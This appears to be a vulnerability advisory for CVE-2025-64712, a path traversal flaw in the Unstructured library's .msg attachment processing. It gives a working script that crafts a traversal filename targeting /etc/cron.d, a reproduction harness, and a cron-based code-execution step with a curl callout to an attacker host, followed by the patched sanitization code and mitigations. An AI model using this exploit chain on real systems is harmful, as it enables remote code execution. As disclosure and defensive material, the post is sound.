Mon 23 February 2026
CVE-2025-64712
Critical Path Traversal RCE in Unstructured Library MSG Processing
February 18, 2026 · CVSS 9.8 Critical · Unstructured < 0.18.18
| CVE ID | CVSS | Affected | Fixed |
|---|---|---|---|
| CVE-2025-64712 | 9.8 Critical | < 0.18.18 | 0.18.18+ |
CVE-2025-64712 Overview: Path Traversal in Unstructured Library
The Unstructured Python library is an open-source toolkit for pre-processing complex document types. In a little over a year, the Unstructured library surpassed 4 million downloads and is used in nearly 10,000 public GitHub repositories, 100 Python packages, and behind the scenes in dozens of LLM-powered products. However, a critical Path Traversal (CWE-22) vulnerability was discovered in its partition_msg function, which processes Microsoft Outlook .msg files. When the process_attachments setting is enabled—which it is by default—the library can be manipulated to write files outside of its intended temporary directories.
def partition_msg(
    filename: Optional[str] = None,
    *,
    file: Optional[IO[bytes]] = None,
    metadata_filename: Optional[str] = None,
    metadata_last_modified: Optional[str] = None,
    process_attachments: bool = True,  # the vulnerability trigger
    **kwargs: Any,
) -> list[Element]:
<SNIP>
Path Traversal in Unstructured Library: Unsafe Filename Handling
The core of the issue is a Path Traversal (CWE-22) vulnerability. The library's _attachment_file_name() function pulls the name of an attachment directly from the .msg file without any sanitization.
@lazyproperty
def _attachment_file_name(self) -> str:
    """The original name of the attached file, no path.
    This value is 'unknown' if it is not present in the MSG file (not
    expected).
    """
    return self._attachment.file_name or "unknown"
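To illustrate why the raw name matters, here is a minimal sketch of what happens when an attacker-controlled name is joined to an extraction directory. The directory /tmp/tmpabc123 and the helper resolve_target are hypothetical and chosen only for illustration; they are not the library's actual path or code. posixpath is used so the result is the same on any platform.

```python
import posixpath


def resolve_target(extract_dir: str, attachment_name: str) -> str:
    """Return the normalized path that a naive join would end up writing to."""
    return posixpath.normpath(posixpath.join(extract_dir, attachment_name))


# Hypothetical temporary directory, not the library's real one.
extract_dir = "/tmp/tmpabc123"

print(resolve_target(extract_dir, "backup_job"))
# -> /tmp/tmpabc123/backup_job

print(resolve_target(extract_dir, "../../../etc/cron.d/backup_job"))
# -> /etc/cron.d/backup_job
```

Each ../ segment climbs one directory, so three of them are more than enough to leave a two-level temporary path and reach the filesystem root.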
CVE-2025-64712 Proof-of-Concept: Remote Code Execution via Path Traversal
Exploitation of CVE-2025-64712 is a deliberate four-step process that turns a standard email attachment into a system-level command. The following steps outline how an attacker moves from a simple .msg file to full Remote Code Execution (RCE).
Step 1: Crafting the Initial .msg File
The attack begins by generating a legitimate Microsoft Outlook Message (.msg) file to serve as the delivery vector.
- Initialize the Draft: Open Outlook and create a new email message.
- Embed the Payload: Populate the message fields and attach the file containing your target content (e.g., a cron job script intended for the target’s configuration directory).
- Export the File: Navigate to File > Save As (or Download > Download as MSG in web clients) to export the message.
At this stage, the file is harmless because the attachment name is standard (e.g., backup_job).

Step 2: Injecting the Traversal Path
The attacker uses a specialized Python script to modify the binary structure of the .msg file. By targeting the OLE structures within the file, the attacker renames the attachment from a simple filename to a relative path containing traversal sequences.
- The Transformation: backup_job becomes ../../../etc/cron.d/backup_job.
- The Result: A crafted payload.msg is generated where the filename itself contains the instructions to escape the temporary directory.
#!/usr/bin/env python3
"""
rename_msg_attachment.py
------------------------
Rename an attachment's filename inside a .msg (OLE2/Compound Document) file.
Supports new filenames of ANY length — reallocates mini-sectors as needed.
Edit the three variables below and run:
python rename_msg_attachment.py
"""
import sys
import struct
import shutil
import os
import math
INPUT_FILE = "backup.msg" # Path to the source .msg file
OLD_NAME = "backup_job" # Current attachment filename
NEW_NAME = "../../../etc/cron.d/backup_job" # New attachment filename
OUTPUT_FILE = "payload.msg" # Output path — leave empty "" to overwrite INPUT_FILE
<SNIP>
# Core rename logic
def rename_attachment(input_path, old_name, new_name, output_path):
    print(f"[*] Opening: {input_path}")
    ole = OleFile(input_path)
    attach_storages = find_attach_storages(ole)
    if not attach_storages:
        err("No attachment storages found in this .msg file.")
    print(f"[*] Found {len(attach_storages)} attachment(s).")
    renamed = 0
    for att in attach_storages:
        children = get_children(ole, att['idx'])
        by_name = {c['name'].upper(): c for c in children}
        long_e = by_name.get(prop_stream_name(PR_ATTACH_LONG_FILENAME).upper())
        short_e = by_name.get(prop_stream_name(PR_ATTACH_FILENAME).upper())
        disp_e = by_name.get(prop_stream_name(PR_DISPLAY_NAME).upper())
        ext_e = by_name.get(prop_stream_name(PR_ATTACH_EXTENSION).upper())
        current = None
        if long_e:
            current = read_unicode(ole, long_e['idx'])
        elif short_e:
            current = read_unicode(ole, short_e['idx'])
        print(f" [{att['name']}] current filename: {current!r}")
        if current is None or current.lower() != old_name.lower():
            continue
        # Encode new values
        new_encoded = encode_unicode(new_name)
        short_encoded = encode_unicode(short_name(new_name))
        parts = new_name.rsplit('.', 1)
        new_ext = ('.' + parts[1]) if len(parts) == 2 else ''
        ext_encoded = encode_unicode(new_ext)
        print(f" [+] Match! Renaming '{current}' -> '{new_name}'")
        print(f" old size: {len(encode_unicode(current))} bytes "
              f"new size: {len(new_encoded)} bytes")
        if long_e:
            ole.write_stream(long_e['idx'], new_encoded)
            print(f" ✓ Long filename patched.")
        if short_e:
            ole.write_stream(short_e['idx'], short_encoded)
            print(f" ✓ Short filename patched -> '{short_name(new_name)}'")
        if disp_e:
            ole.write_stream(disp_e['idx'], new_encoded)
            print(f" ✓ Display name patched.")
        if ext_e:
            ole.write_stream(ext_e['idx'], ext_encoded)
            print(f" ✓ Extension patched -> '{new_ext}'")
        renamed += 1
    if renamed == 0:
        print(f"\n[!] No attachment named '{old_name}' was found.")
        all_names = []
        for att in attach_storages:
            children = get_children(ole, att['idx'])
            by_name = {c['name'].upper(): c for c in children}
            long_e = by_name.get(prop_stream_name(PR_ATTACH_LONG_FILENAME).upper())
            short_e = by_name.get(prop_stream_name(PR_ATTACH_FILENAME).upper())
            name = None
            if long_e:
                name = read_unicode(ole, long_e['idx'])
            elif short_e:
                name = read_unicode(ole, short_e['idx'])
            if name:
                all_names.append(name)
        if all_names:
            print(f" Available attachment(s): {', '.join(repr(n) for n in all_names)}")
            def similarity(a, b):
                a, b = a.lower(), b.lower()
                return sum(c in b for c in a) / max(len(a), 1)
            best = max(all_names, key=lambda n: similarity(old_name, n))
            if similarity(old_name, best) > 0.5:
                print(f" Did you mean: '{best}' ?")
        sys.exit(1)
    ole.save(output_path)
    print(f"\n[✓] Saved to: {output_path} ({renamed} attachment(s) renamed)")
<SNIP>

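The helpers used by the script above are elided, so the following is only a sketch of the arithmetic behind its "old size / new size" output and its mention of mini-sectors. It assumes that attachment names are stored as UTF-16LE text in streams named after the property tag (as the MSG format describes for Unicode string properties) and that a Compound File mini-sector holds 64 bytes. The function names here are stand-ins, not the script's own helpers.

```python
import math

# Assumed format constants; they are not taken from the elided script.
PID_TAG_ATTACH_LONG_FILENAME = 0x3707  # property ID of the long attachment filename
PT_UNICODE = 0x001F                    # property type for UTF-16LE strings
MINI_SECTOR_SIZE = 64                  # bytes per mini-sector in a Compound File


def substg_stream_name(prop_id: int, prop_type: int) -> str:
    """Build the stream name that holds a variable-length property."""
    return f"__substg1.0_{prop_id:04X}{prop_type:04X}"


def utf16le_size(name: str) -> int:
    """Number of bytes the name occupies when encoded as UTF-16LE."""
    return len(name.encode("utf-16-le"))


def mini_sectors_needed(num_bytes: int) -> int:
    """Number of 64-byte mini-sectors needed to hold num_bytes."""
    return math.ceil(num_bytes / MINI_SECTOR_SIZE)


print(substg_stream_name(PID_TAG_ATTACH_LONG_FILENAME, PT_UNICODE))
# -> __substg1.0_3707001F

for name in ("backup_job", "../../../etc/cron.d/backup_job"):
    size = utf16le_size(name)
    print(f"{name!r}: {size} bytes, {mini_sectors_needed(size)} mini-sector(s)")
# -> 'backup_job': 20 bytes, 1 mini-sector(s)
# -> '../../../etc/cron.d/backup_job': 60 bytes, 1 mini-sector(s)
```

Under these assumptions the traversal name used in this walkthrough still fits in a single mini-sector; only a longer name, such as one with many more ../ segments, would need additional sectors.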
Step 3: Setting Up the Test Environment
To reproduce the flaw, a controlled environment (typically a Docker container) is used to run the vulnerable version of the unstructured library (v0.18.15). A simple Python wrapper is written to call the partition_msg function with the critical process_attachments=True flag enabled.
import os
import sys
from unstructured.partition.msg import partition_msg

# Disable the digit limit that causes parser crashes
if hasattr(sys, 'set_int_max_str_digits'):
    sys.set_int_max_str_digits(0)


def process_msg():
    print("[*] Handing payload.msg to partition_msg()...")
    try:
        # This triggers the vulnerable function:
        partition_msg(
            filename="payload.msg",
            process_attachments=True
        )
    except Exception as e:
        # We catch the exception because the parser often crashes
        # AFTER the file is written due to OLE sector math errors.
        print(f"[!] Parser finished with: {e}")
    # THE FINAL VERDICT
    if os.path.exists("/etc/cron.d/backup_job"):
        print("\n" + "="*45)
        print("!!! VULNERABILITY REPRODUCED !!!")
        print("The library wrote successfully to '/etc/cron.d/backup_job'")
        with open("/etc/cron.d/backup_job", "r") as f:
            print(f"File content: {f.read()}")
        print("="*45)
    else:
        print("\n[-] Exploit failed: /etc/cron.d/backup_job not found.")


if __name__ == "__main__":
    process_msg()
Step 4: Exploitation and RCE
When the reproduction script processes the malicious payload.msg, the library extracts the attachment. Because it lacks sanitization, it joins the traversal string to its internal path, writing the file directly into the host's system directory.
- File Write: The library writes the attacker's script to /etc/cron.d/backup_job.
- Command Execution: The system's cron daemon picks up the new job, which might contain a command like curl http://attacker-ip:port/rce_test.
- The Verdict: The attacker observes an incoming request on their server, confirming that they can now execute arbitrary code on the target system.
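The file-write step can be observed safely without touching the real /etc. The sketch below is a simulation, not the library's code: it builds a throwaway sandbox with its own etc/cron.d folder, performs a naive join-and-write with a traversal name, and checks where the file landed. The directory layout and the function simulate_unsafe_extract are assumptions made for this example.

```python
import os
import tempfile


def simulate_unsafe_extract(sandbox_root: str, attachment_name: str, payload: str) -> str:
    """Write payload the way an unsanitized extractor would; return the real path written."""
    extract_dir = os.path.join(sandbox_root, "work", "tmp_extract")
    os.makedirs(extract_dir, exist_ok=True)
    # Stand-in for the host's cron directory, kept inside the sandbox.
    os.makedirs(os.path.join(sandbox_root, "etc", "cron.d"), exist_ok=True)

    target = os.path.join(extract_dir, attachment_name)  # no sanitization
    with open(target, "w") as handle:
        handle.write(payload)
    return os.path.realpath(target)


with tempfile.TemporaryDirectory() as sandbox:
    written = simulate_unsafe_extract(
        sandbox, "../../etc/cron.d/backup_job", "# harmless placeholder\n"
    )
    extract_dir = os.path.realpath(os.path.join(sandbox, "work", "tmp_extract"))
    escaped = not written.startswith(extract_dir + os.sep)
    print(f"escaped extraction directory: {escaped}")
```

Only two ../ segments are needed here because the simulated extraction directory sits two levels below the sandbox root; the real attack uses enough segments to reach the filesystem root.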

How to Fix CVE-2025-64712 in Unstructured Library
The most effective way to secure your environment is to update to Unstructured version 0.18.18 or higher. The fix introduces a robust sanitization process that strips away dangerous path components.
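A quick way to confirm which side of the fix an environment is on is to compare the installed version against 0.18.18. The following is a minimal sketch using only the standard library; the helper names are made up for this example, and the simple parser ignores pre-release suffixes, so a dedicated version library is a better choice where one is available.

```python
import re
from importlib.metadata import PackageNotFoundError, version

FIXED_VERSION = (0, 18, 18)  # first release containing the fix, per the advisory


def parse_release(version_string: str) -> tuple:
    """Extract the leading major.minor.patch numbers, ignoring any suffix."""
    numbers = []
    for piece in version_string.split(".")[:3]:
        match = re.match(r"\d+", piece)
        numbers.append(int(match.group()) if match else 0)
    while len(numbers) < 3:
        numbers.append(0)
    return tuple(numbers)


def is_patched(version_string: str) -> bool:
    """True when the given version is 0.18.18 or newer."""
    return parse_release(version_string) >= FIXED_VERSION


def installed_unstructured_is_patched():
    """Return True/False for the installed package, or None if it is absent."""
    try:
        return is_patched(version("unstructured"))
    except PackageNotFoundError:
        return None


print(is_patched("0.18.15"))  # -> False
print(is_patched("0.18.18"))  # -> True
print(installed_unstructured_is_patched())
```

Comparing integer tuples avoids the classic string-comparison mistake where "0.18.9" would sort after "0.18.18".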
Remediated Code Analysis
The patched version now includes logic to clean the filename for both Unix and Windows path separators:
# The updated, safe logic in v0.18.18+
raw_filename = self._attachment.file_name or "unknown"
# Remove path components and handle cross-platform attacks
safe_filename = os.path.basename(raw_filename.replace("\\", "/"))
# Strip null bytes
safe_filename = safe_filename.replace("\0", "")
# Ensure the filename isn't empty or just dots
if not safe_filename or safe_filename in (".", ".."):
    safe_filename = "unknown"
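To see how this logic behaves on hostile input, the same steps can be wrapped in a standalone function and fed a few names. This is a sketch that mirrors the snippet above; the function name sanitize_attachment_name is invented for the example and is not part of the library.

```python
import os


def sanitize_attachment_name(raw_filename):
    """Reduce an untrusted attachment name to a bare, non-empty file name."""
    raw_filename = raw_filename or "unknown"
    # Treat Windows separators like Unix ones, then keep only the last component.
    safe_filename = os.path.basename(raw_filename.replace("\\", "/"))
    # Drop embedded null bytes.
    safe_filename = safe_filename.replace("\0", "")
    # Fall back to a placeholder if nothing usable is left.
    if not safe_filename or safe_filename in (".", ".."):
        safe_filename = "unknown"
    return safe_filename


for name in ("../../../etc/cron.d/backup_job", "..\\..\\evil.txt", "..", "dir/", None):
    print(repr(name), "->", repr(sanitize_attachment_name(name)))
# '../../../etc/cron.d/backup_job' -> 'backup_job'
# '..\\..\\evil.txt' -> 'evil.txt'
# '..' -> 'unknown'
# 'dir/' -> 'unknown'
# None -> 'unknown'
```

Normalizing backslashes first matters on Unix-like systems, where os.path.basename() does not treat a backslash as a separator and would otherwise return the whole Windows-style path unchanged.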
CVE-2025-64712 Mitigation and Best Practices
- Update Now: If you use unstructured for email processing, ensure you are on version 0.18.18 or later.
- Sanitize Inputs: Always reduce filenames taken from external files to their base name, for example with os.path.basename() after converting backslashes to forward slashes.
- Permission Check: Run your processing scripts with the minimum necessary permissions to limit the impact of a potential file-write vulnerability.
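As an extra layer on top of filename sanitization, code that writes extracted files can verify that the final path still lies inside the intended directory. The sketch below shows one way to do that with pathlib; safe_join is a hypothetical helper written for this article, not an API of the unstructured library.

```python
import tempfile
from pathlib import Path


def safe_join(base_dir, untrusted_name) -> Path:
    """Join untrusted_name onto base_dir, refusing results outside base_dir."""
    base = Path(base_dir).resolve()
    candidate = (base / untrusted_name).resolve()
    # The candidate must be strictly below the base directory.
    if base not in candidate.parents:
        raise ValueError(f"refusing to write outside {base}: {untrusted_name!r}")
    return candidate


with tempfile.TemporaryDirectory() as base_dir:
    print(safe_join(base_dir, "report.txt").name)  # -> report.txt
    try:
        safe_join(base_dir, "../../etc/cron.d/backup_job")
    except ValueError:
        print("traversal attempt rejected")
```

Because the check runs on the resolved path, it also rejects absolute names such as /etc/passwd, which would otherwise replace the base directory entirely when joined.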
| Resource | Link |
|---|---|
| Unstructured CVE-2025-64712 | https://github.com/Unstructured-IO/unstructured/security/advisories/GHSA-gm8q-m8mv-jj5m |
| Unstructured Fix | https://github.com/Unstructured-IO/unstructured/compare/0.18.15...0.18.18 |
| NVD | https://nvd.nist.gov/vuln/detail/CVE-2025-64712 |
| CWE-22 | https://cwe.mitre.org/data/definitions/22.html |